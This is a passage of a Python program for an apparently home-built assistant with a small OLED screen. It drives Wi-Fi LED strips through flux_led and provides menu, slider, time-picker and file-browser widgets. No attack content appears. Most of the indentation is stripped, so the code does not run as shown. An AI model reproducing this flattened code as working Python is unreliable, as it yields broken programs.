fgcolorpat = ['setPresetPattern(0x25,100)','setPresetPattern(0x26,100)','setPresetPattern(0x27,100)','setPresetPattern(0x28,100)','setPresetPattern(0x29,100)','setPresetPattern(0x2a,100)','setPresetPattern(0x2b,100)','setPresetPattern(0x2c,100)','setPresetPattern(0x2d,100)','setPresetPattern(0x2e,100)','setPresetPattern(0x2f,100)','setPresetPattern(0x30,100)','setPresetPattern(0x31,100)','setPresetPattern(0x32,100)','setPresetPattern(0x33,100)','setPresetPattern(0x34,100)','setPresetPattern(0x35,100)','setPresetPattern(0x36,100)','setPresetPattern(0x37,100)','setPresetPattern(0x38,100)']
collen = 0
mixcolornamepat = []
while collen < len(fgcolorpatname):
mixcolornamepat.append([str(fgcolorpatname[collen]),str(fgcolorpat[collen])])
collen = collen + 1
presety = Myassistant.select_list(self,mixcolornamepat,'preset pattern')
if not presety == None:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
speed = Myassistant.select_cursor(self,100,0,5,100,"",'speed')
presety = str(presety).replace(',100)',','+str(speed)+')')
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
eval('wifiled.' + str(presety))
else:
eval('wifiled.' + str(presety))
elif ffgddsj == 'color':
jgiush = []
responscoled = flux_led.utils.get_color_names_list()
for tey in responscoled:
jgiush.append([tey,tey])
dflfd = Myassistant.select_search_list(self,jgiush)
if not dflfd == None:
resultintero = flux_led.utils.color_object_to_tuple(dflfd)
                                        if name == 'All':
                                            for adresr in listwifi:
                                                wifiled = listwifi[adresr]
                                                wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
                                        else:
                                            wifiled.setRgb(resultintero[0],resultintero[1],resultintero[2])
elif selection[1] == 4:
set_alarm_list = [['Set new alarm','newalarm'],
['Get alarm','getalarm'],
['Remove alarm',[[['All','removeall'],
['Specific alarm','removespecific'],
['Exit','exit']],'remove']],
['Exit','exit']]
setal = Myassistant.select_list(self,set_alarm_list,'led strip alarm')
if setal == 'newalarm':
selecttime = Myassistant.select_time(self,'--', '--', '-', 'new alarm',True)
if not (selecttime[0] == '--' or selecttime[1] == '--'):
color = Myassistant.select_led_strip_color_alarm(self)
Myassistant.set_word_aff(self, 'Loading please wait')
f = flux_led.LedTimer()
f.setActive()
f.setTime(int(selecttime[0]),int(selecttime[1]))
if selecttime[2] == '-':
f.setRepeatMask(flux_led.LedTimer.Everyday)
else:
if selecttime[2] == "Monday" :
f.setRepeatMask(flux_led.LedTimer.Mo)
elif selecttime[2] == "Tuesday" :
f.setRepeatMask(flux_led.LedTimer.Tu)
elif selecttime[2] == "Wednesday" :
f.setRepeatMask(flux_led.LedTimer.We)
elif selecttime[2] == "Thursday" :
f.setRepeatMask(flux_led.LedTimer.Th)
elif selecttime[2] == "Friday" :
f.setRepeatMask(flux_led.LedTimer.Fr)
elif selecttime[2] == "Saturday" :
f.setRepeatMask(flux_led.LedTimer.Sa)
elif selecttime[2] == "Sunday" :
f.setRepeatMask(flux_led.LedTimer.Su)
eval('f.'+str(color[1]))
if '[' in str(color[0]):
for adress in color[0]:
wifiled = led.WifiLedBulb(adress)
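                                                # Shift the six LedTimer slots down by one so the new
                                                # timer `f` ends up in slot 0; the timer previously in
                                                # slot 5 is dropped.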
timeur = wifiled.getTimers()
timeur[5] = timeur[4]
timeur[4] = timeur[3]
timeur[3] = timeur[2]
timeur[2] = timeur[1]
timeur[1] = timeur[0]
timeur[0] = f
wifiled.sendTimers(timeur)
else:
wifiled = led.WifiLedBulb(color[0])
timeur = wifiled.getTimers()
timeur[5] = timeur[4]
timeur[4] = timeur[3]
timeur[3] = timeur[2]
timeur[2] = timeur[1]
timeur[1] = timeur[0]
timeur[0] = f
wifiled.sendTimers(timeur)
elif setal == 'getalarm':
lljsdj = []
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
timeur = wifiled.getTimers()
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),'any'])
else:
timeur = wifiled.getTimers()
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),'any'])
lljsdj.append(['Exit','any'])
rien = Myassistant.select_list(self,lljsdj,'led strip alarm')
elif setal == 'removespecific':
lljsdj = []
conteur = 0
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
timeur = wifiled.getTimers()
conteur = 0
for t in timeur:
if not str(t) == 'Unset':
                                                    # store the bulb's IP so the alarm can later be removed on the right strip
                                                    lljsdj.append([str(t),str(ip_wifi_led[name_wifi_led.index(adresr)])+','+str(conteur)])
conteur = conteur + 1
else:
timeur = wifiled.getTimers()
conteur = 0
for t in timeur:
if not str(t) == 'Unset':
lljsdj.append([str(t),str(conteur)])
conteur = conteur + 1
lljsdj.append(['Exit','exit'])
rien = Myassistant.select_list(self,lljsdj,'select alarm')
if ',' in str(rien):
ghhjf = rien.split(',')
wifiled = led.WifiLedBulb(ghhjf[0])
f = flux_led.LedTimer()
f.setActive(False)
timeur = wifiled.getTimers()
timeur[int(ghhjf[1])] = f
Myassistant.set_word_aff(self, 'Loading please wait')
wifiled.sendTimers(timeur)
while not len(self.buton) == 0:
del self.buton[0]
elif not rien == 'exit' and not rien == None:
f = flux_led.LedTimer()
f.setActive(False)
timeur = wifiled.getTimers()
timeur[int(rien)] = f
Myassistant.set_word_aff(self, 'Loading please wait')
wifiled.sendTimers(timeur)
while not len(self.buton) == 0:
del self.buton[0]
elif setal == 'removeall':
Myassistant.set_word_aff(self, 'Loading please wait')
f = flux_led.LedTimer()
f.setActive(False)
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
wifiled.sendTimers([f,f,f,f,f,f])
else:
wifiled.sendTimers([f,f,f,f,f,f])
elif not selection[1] == 10:
selection[0] = not selection[0]
if selection[0] and selection[1] == 5:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
elif selection[1] == 10:
selection[1] = 0
for adresr in listwifi:
wifiled = listwifi[adresr]
if not wifiled.isOn():
wifiled.turnOn()
elif self.buton[0] == 2 :
del self.buton[0]
if selection[1] == 10:
cont = False
Myassistant.execute_next(self,'right')
elif selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
else:
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness+10)
else:
if brightnes+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes+10)
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]+10 > 255 :
wifiled.setRgbw(r=255,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]+10,g=y[1],b=y[2],w=y[3])
else:
if r+10 > 255:
wifiled.setRgbw(r=255,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r+10,g=g,b=b,w=w)
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]+10 > 255 :
wifiled.setRgbw(r=y[0],g=255,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]+10,b=y[2],w=y[3])
else:
if g+10 > 255:
wifiled.setRgbw(r=r,g=255,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g+10,b=b,w=w)
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=255,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]+10,w=y[3])
else:
                                        if b+10 > 255:
wifiled.setRgbw(r=r,g=g,b=255,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b+10,w=w)
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]+10 > 255 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=255)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]+10)
else:
if w+10 > 255:
wifiled.setRgbw(r=r,g=g,b=b,w=255)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w+10)
elif selection[1] == 5:
if not selectlist + 1 > len(colorlist)-1:
selectlist = selectlist + 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
else:
if not selection[1] + 1 > 9:
selection[1] = selection[1] + 1
else:
selection[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if selection[1] == 10:
cont = False
Myassistant.execute_next(self,'left')
elif selection[0]:
if selection[1] == 0:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
else:
if ison:
wifiled.turnOff()
else:
wifiled.turnOn()
elif selection[1] == 1:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if wifiled.brightness-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3],brightness=wifiled.brightness-10)
else:
if brightnes-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w,brightness=brightnes-10)
elif selection[1] == 6:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[0]-10 < 0 :
wifiled.setRgbw(r=0,g=y[1],b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0]-10,g=y[1],b=y[2],w=y[3])
else:
if r-10 < 0:
wifiled.setRgbw(r=0,g=g,b=b,w=w)
else:
wifiled.setRgbw(r=r-10,g=g,b=b,w=w)
elif selection[1] == 7:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[1]-10 < 0 :
wifiled.setRgbw(r=y[0],g=0,b=y[2],w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1]-10,b=y[2],w=y[3])
else:
if g-10 < 0:
wifiled.setRgbw(r=r,g=0,b=b,w=w)
else:
wifiled.setRgbw(r=r,g=g-10,b=b,w=w)
elif selection[1] == 8:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[2]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=0,w=y[3])
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2]-10,w=y[3])
else:
if b-10 < 0:
wifiled.setRgbw(r=r,g=g,b=0,w=w)
else:
wifiled.setRgbw(r=r,g=g,b=b-10,w=w)
elif selection[1] == 9:
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
y = wifiled.getRgbw()
if y[3]-10 < 0 :
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=0)
else:
wifiled.setRgbw(r=y[0],g=y[1],b=y[2],w=y[3]-10)
else:
if w-10 < 0:
wifiled.setRgbw(r=r,g=g,b=b,w=0)
else:
wifiled.setRgbw(r=r,g=g,b=b,w=w-10)
elif selection[1] == 5:
if not selectlist - 1 < 0:
selectlist = selectlist - 1
if name == 'All':
for adresr in listwifi:
wifiled = listwifi[adresr]
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
else:
try:
eval('wifiled.' + str(coloraction[selectlist]))
except:
print('Failed to execute : "' + str(coloraction[selectlist]) + '"')
ifwantreload = 0
else:
if not selection[1] - 1 < 0:
selection[1] = selection[1] - 1
else:
selection[1] = 9
ifwantreload = 0
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
self.veil = 0
buton = buton - 1
except BrokenPipeError :
self.veil = 0
threading.Timer(0, Myassistant.aff_heure,[self]).start()
print('Failed : "led strip"')
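    # File browser used to pick music files/folders. Button 0 goes up one
    # directory, button 1 enters the highlighted entry (confirming it when it
    # is a file), buttons 2/3 move the selection; dot files are hidden and
    # long names scroll horizontally. When `stetdff` is True a long press on
    # the select button (sampled from GPIO pin `bround`) appears to confirm
    # the highlighted entry even if it is a directory, so whole folders can
    # be queued. Returns the chosen path, or None if interrupted by an alarm.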
def select_path(self, path, stetdff):
choice = True
selist = [15, 0]
memy = 3
x = 2
xpat = 0
direcpat = 0
direc = 0
while choice and not self.al:
try:
listaff = os.listdir(path)
except:
listaff = []
ct = len(listaff) - 1
while ct > -1:
if str(listaff[ct])[0] == '.' :
del listaff[ct]
ct = ct - 1
if listaff == []:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text((xpat,0), path, font=font, fill=225)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
time.sleep(1)
xpat = 0
path = path.split("/")
del path[len(path) - 1]
path = "/".join(path)
if path == '':
path = '/'
selist = [15,0]
memy = 3
try:
listaff = os.listdir(path)
except:
path = '/'
listaff = os.listdir('/')
if listaff == []:
path = '/'
listaff = os.listdir('/')
ct = len(listaff) - 1
while ct > -1:
if str(listaff[ct])[0] == '.' :
del listaff[ct]
ct = ct - 1
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if len(path) * 6 > 128 :
if direcpat == 0 :
if len(path) * 6 + xpat > 128 :
xpat = xpat - 4
else :
direcpat = 1
else :
xpat = xpat + 4
if xpat > 1 :
direcpat = 0
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((xpat,0), path, font=font, fill=225)
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
xpat = 0
path = path.split("/")
del path[len(path) - 1]
path = "/".join(path)
if path == '':
path = '/'
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
xpat = 0
if stetdff:
thetime = 10
while thetime > 0:
time.sleep(0.1)
if GPIO.input(bround) == 1 :
thetime = -9
thetime = thetime - 1
while not len(self.buton) == 0:
del self.buton[0]
while not len(self.buton) == 0:
del self.buton[0]
else:
thetime = -10
if thetime == -10:
if path == '/':
path = '/' + listaff[selist[1]]
else:
path = path + '/' + listaff[selist[1]]
if os.path.isfile(path):
choice = False
else:
if path == '/':
path = '/' + listaff[selist[1]]
else:
path = path + '/' + listaff[selist[1]]
choice = False
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
memy = memy - 12
selist[0] = 51
elif self.buton[0] == 3 :
del self.buton[0]
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
elif len(path) * 6 > 128 :
buton = buton - 1
if choice:
return None
else:
return path
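    # Slider widget: shows `name` above a horizontal scale and lets buttons
    # 2/3 change the value between nmin and nmax in steps of `increment`;
    # buttons 0 and 1 both confirm. Returns the selected number, e.g. the
    # volume menu calls select_cursor(self, 100, 0, 5, vol, '%', 'volume').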
def select_cursor(self, nmax, nmin, increment, start, unit, name):
cont = True
cu = start
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
draw.line((10,31,117,31), fill = 255)
            pos = ((107 / ((nmax - nmin) + 1)) * (cu - nmin)) + 10
            draw.rectangle((pos - 2, 26, pos + 2, 36), outline=255, fill=255)
draw.text((pos - (len(str(cu) + unit) * 6) / 2 + 1,40), str(cu) + unit, font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = True
while buton and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
elif self.buton[0] == 1 :
del self.buton[0]
cont = False
elif self.buton[0] == 2 :
del self.buton[0]
if not cu + increment > nmax:
cu = cu + increment
else:
cu = nmax
elif self.buton[0] == 3 :
del self.buton[0]
if not cu - increment < nmin:
cu = cu - increment
else:
cu = nmin
if not len(self.buton) == 0:
buton = True
else:
buton = False
return cu
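    # Hour/minute/day picker used by the alarms and the music sleep timer.
    # Buttons 2/3 move the focus between hour, minute and day (or change the
    # value while button 1 has toggled edit mode); button 0 exits. With
    # ops=True the hour/minute can wrap to '--' and the day to '-', meaning
    # "unset"/"every day". Returns [hour, minute, day]; if the dialog is
    # interrupted by an alarm it returns ['--', '--', '-'] instead.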
def select_time(self, shour, sminu, sday, name,ops = False):
cont = True
sel = [False,0]
while cont and not self.al:
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
draw.text(((127 - (len(name) * 6)) / 2,0), name, font=font, fill=225)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=225)
draw.text((43,20), shour + ' ' + sminu, font=font, fill=225)
if sel[1] == 2:
if sel[0] :
draw.rectangle((((128 - (len(sday) * 6)) / 2) - 2, 32, (((128 - (len(sday) * 6)) / 2) + len(sday) * 6) + 1, 44), outline=255, fill=255)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=0)
else:
draw.rectangle((((128 - (len(sday) * 6)) / 2) - 2, 32, (((128 - (len(sday) * 6)) / 2) + len(sday) * 6) + 1, 44), outline=255, fill=0)
draw.text(((128 - (len(sday) * 6)) / 2,32),sday, font=font, fill=225)
elif sel[1] == 0:
if sel[0] :
draw.rectangle((41, 20, 56, 30), outline=255, fill=255)
draw.text((43,20), shour, font=font, fill=0)
else:
draw.rectangle((41, 20, 56, 30), outline=255, fill=0)
draw.text((43,20), shour, font=font, fill=225)
elif sel[1] == 1:
if sel[0] :
draw.rectangle((71, 20, 86, 30), outline=255, fill=255)
draw.text((43,20), ' ' + sminu, font=font, fill=0)
else:
draw.rectangle((71, 20, 86, 30), outline=255, fill=0)
draw.text((43,20),' ' + sminu, font=font, fill=225)
draw.text((61,20),':', font=font, fill=225)
if int(time.strftime("%S")) % 2 == 0 :
draw.text((49,54),str(time.strftime("%H")) + ":" + str(time.strftime("%M")) , font=font, fill=225)
else :
draw.text((49,54),str(time.strftime("%H")) + " " + str(time.strftime("%M")) , font=font, fill=225)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
self.veil = 0
while buton > 0 and not self.al:
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
cont = False
elif self.buton[0] == 1 :
del self.buton[0]
sel[0] = not sel[0]
elif self.buton[0] == 2 :
del self.buton[0]
if sel[0]:
if sel[1] == 0:
if ops:
if shour == '23':
shour = "--"
elif shour == '--':
shour = "00"
else:
shour = Myassistant.ad_hour(shour,1)
else:
shour = Myassistant.ad_hour(shour,1)
elif sel[1] == 1:
if ops:
if sminu == '59':
sminu = "--"
elif sminu == '--':
sminu = "00"
else:
sminu = Myassistant.ad_min(sminu,1)
else:
sminu = Myassistant.ad_min(sminu,1)
elif sel[1] == 2:
if ops:
if sday == 'Sunday':
sday = "-"
elif sday == '-':
sday = "Monday"
else:
sday = Myassistant.ad_day(sday,1)
else:
sday = Myassistant.ad_day(sday,1)
else:
sel[1] = sel[1] + 1
if sel[1] > 2 :
sel[1] = 0
elif self.buton[0] == 3 :
del self.buton[0]
if sel[0]:
if sel[1] == 0:
if ops:
if shour == '00':
shour = "--"
elif shour == '--':
shour = "23"
else:
shour = Myassistant.remove_hour(shour,1)
else:
shour = Myassistant.remove_hour(shour,1)
elif sel[1] == 1:
if ops:
if sminu == '00':
sminu = "--"
elif sminu == '--':
sminu = "59"
else:
sminu = Myassistant.remove_min(sminu,1)
else:
sminu = Myassistant.remove_min(sminu,1)
elif sel[1] == 2:
if ops:
if sday == 'Monday':
sday = "-"
elif sday == '-':
sday = "Sunday"
else:
sday = Myassistant.remove_day(sday,1)
else:
sday = Myassistant.remove_day(sday,1)
else:
sel[1] = sel[1] - 1
if sel[1] < 0 :
sel[1] = 2
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
buton = buton - 1
if cont:
return ['--','--','-']
else:
return [shour, sminu, sday]
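    # Scrolling menu. `listl` is a list of [label, value] pairs; a value may
    # itself be [[sub-entries], 'title'] to open a nested sub-menu (button 0
    # then goes back up one level, button 1 confirms, buttons 2/3 move).
    # Returns the value of the chosen entry, or None if interrupted by an
    # alarm; long labels and titles scroll horizontally.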
def select_list(self, listl, name):
choice = True
selist = [15, 0]
memy = 3
x = 2
xpat = 0
direcpat = 0
direc = 0
namegf = name
listachang = listl
response = ''
historlist = []
historlist.append(listl)
while choice and not self.al:
listaff = []
for hap in listachang:
listaff.append(hap[0])
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if len(namegf) * 6 > 128 :
if direcpat == 0 :
if len(namegf) * 6 + xpat > 128 :
xpat = xpat - 4
else :
direcpat = 1
else :
xpat = xpat + 4
if xpat > 1 :
direcpat = 0
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((xpat,0), namegf, font=font, fill=225)
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
xpat = 0
if not len(historlist) - 2 < 0:
namegf = namegf.split('>')
namegf = namegf[len(namegf)-2]
listachang = historlist[len(historlist)-2]
del historlist[len(historlist)-1]
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
xpat = 0
if '[' in str(listachang[selist[1]][1]):
namegf = namegf + '>' + str(listachang[selist[1]][1][1])
historlist.append(listachang[selist[1]][1][0])
listachang = listachang[selist[1]][1][0]
else:
response = str(listachang[selist[1]][1])
choice = False
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
memy = memy - 12
selist[0] = 51
elif self.buton[0] == 3 :
del self.buton[0]
selist = [selist[0] - 12,selist[1] - 1]
if selist[1] < 0:
selist = [15, 0]
elif selist[0] < 14 :
memy = memy + 12
selist[0] = 15
if not len(self.buton) == 0:
buton = 5
else:
buton = 0
x = 2
if len(listaff[selist[1]]) * 6 > 124 :
buton = buton - 1
elif len(namegf) * 6 > 128 :
buton = buton - 1
if choice:
return None
else:
return response
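    # Searchable list (used e.g. for the flux_led colour names). The top line
    # is an editable search string: button 1 toggles character editing,
    # buttons 2/3 cycle the current letter or append/delete characters, and
    # button 0 switches between the search field and the results, which are
    # filtered with Myassistant.search_wordt. Returns the value of the chosen
    # [label, value] pair, or None.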
def select_search_list(self, listl):
choice = True
selist = [15, 0]
memy = 3
x = 2
direcpat = 0
direc = 0
namegf = ''
listachang = listl
response = ''
hresqtr = False
seraselect = [0,False]
while choice and not self.al:
if not (namegf == '' or namegf == ' '):
kghl = []
for hap in listl:
kghl.append(hap[0])
if namegf[len(namegf)-1] == ' ':
hkhkk = []
for leter in namegf:
hkhkk.append(leter)
del hkhkk[len(hkhkk)-1]
fghdhgh = "".join(hkhkk)
nlistv = Myassistant.search_wordt(fghdhgh,kghl)
else:
nlistv = Myassistant.search_wordt(namegf,kghl)
listachang = []
for xmots in nlistv:
wlit = len(listl)-1
while wlit > -1:
if xmots == listl[wlit][0]:
listachang.append([listl[wlit][0],listl[wlit][1]])
wlit = -1
wlit = wlit - 1
else:
listachang = listl
listaff = []
for hap in listachang:
listaff.append(hap[0])
image = Image.new('1', (disp.width,disp.height))
draw = ImageDraw.Draw(image)
if not listaff == [] and hresqtr:
if len(listaff[selist[1]]) * 6 > 124 :
if direc == 0 :
if len(listaff[selist[1]]) * 6 + x > 124 :
x = x - 4
else :
direc = 1
else :
x = x + 4
if x > 3 :
direc = 0
if hresqtr:
draw.rectangle((0, selist[0], 127, selist[0] + 12), outline=255, fill=0)
y = memy
lllo = 0
while lllo < len(listaff):
y = y + 12
if lllo == selist[1]:
draw.text((x,y), str(listaff[lllo]), font=font, fill=225)
else :
draw.text((2,y), str(listaff[lllo]), font=font, fill=225)
lllo = lllo + 1
draw.rectangle((126, 16, 126, 26), outline=0, fill=0)
draw.rectangle((126, 28, 126, 38), outline=0, fill=0)
draw.rectangle((126, 40, 126, 50), outline=0, fill=0)
draw.rectangle((126, 52, 126, 62), outline=0, fill=0)
draw.rectangle((127, 16, 127, 26), outline=0, fill=0)
draw.rectangle((127, 28, 127, 38), outline=0, fill=0)
draw.rectangle((127, 40, 127, 50), outline=0, fill=0)
draw.rectangle((127, 52, 127, 62), outline=0, fill=0)
draw.rectangle((1, 16, 1, 26), outline=0, fill=0)
draw.rectangle((1, 28, 1, 38), outline=0, fill=0)
draw.rectangle((1, 40, 1, 50), outline=0, fill=0)
draw.rectangle((1, 52, 1, 62), outline=0, fill=0)
draw.rectangle((0, 0, 127, 14), outline=0, fill=0)
draw.text((0,-2), namegf, font=font, fill=225)
if not hresqtr:
if seraselect[1]:
draw.rectangle((seraselect[0]*6, 0, seraselect[0]*6+5, 10), outline=255, fill=255)
if len(namegf) == 0:
namegf = ' '
seraselect[0] = 0
draw.text((seraselect[0]*6,-1), namegf[seraselect[0]], font=font, fill=0)
else:
draw.line((seraselect[0]*6, 10, seraselect[0]*6+5, 10), fill=255)
if hresqtr:
draw.line((127, selist[0], 127, selist[0] + 12), fill=255)
draw.line((0, 12, 127, 12), fill=255)
disp.image(image)
Myassistant.refrech_error()
buton = 20000
while buton > 0 and not self.al:
self.veil = 0
if not len(self.buton) == 0:
if self.buton[0] == 0 :
del self.buton[0]
if not listaff == []:
hresqtr = not hresqtr
selist = [15,0]
memy = 3
elif self.buton[0] == 1 :
del self.buton[0]
if hresqtr:
response = str(listachang[selist[1]][1])
choice = False
else:
seraselect[1] = not seraselect[1]
selist = [15,0]
memy = 3
elif self.buton[0] == 2 :
del self.buton[0]
if hresqtr:
if not selist[1] + 1 > len(listaff) - 1:
selist = [selist[0] + 12,selist[1] + 1]
if selist[0] > 52 :
